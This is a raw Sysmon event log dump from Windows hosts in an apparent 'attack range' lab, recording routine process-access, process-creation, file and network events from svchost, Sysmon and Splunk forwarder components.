11:08:47.753{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220005Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.753{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220004Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.753{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220003Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.753{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220002Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.753{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220001Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.753{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220000Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.753{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219999Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.753{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219998Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.753{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219997Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.753{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-15BF-6216-DA04-000000003902}1052C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219996Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.753{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-15BF-6216-DA04-000000003902}1052C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219995Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.755{4F8D34B0-15BF-6216-DA04-000000003902}1052C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000219994Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:45.843{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51553-false10.0.1.12-8089- 10341000x8000000000000000219993Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.691{4F8D34B0-15BF-6216-D904-000000003902}27001788C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000219992Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.488{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E6CED0FF494C98811F600BA8A2B2872,SHA256=F33E5CFD186E9E737DCEC8F0E3179645EBACAADDBEB96E9421D661BF2A154CCF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295875Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:45.555{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49285-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000219991Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.253{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-15BF-6216-D904-000000003902}2700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219990Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.253{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219989Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.253{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219988Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.253{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219987Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.253{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219986Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.253{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219985Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.253{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219984Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.253{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219983Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.253{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219982Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.253{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219981Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.253{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-15BF-6216-D904-000000003902}2700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219980Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.253{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-15BF-6216-D904-000000003902}2700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 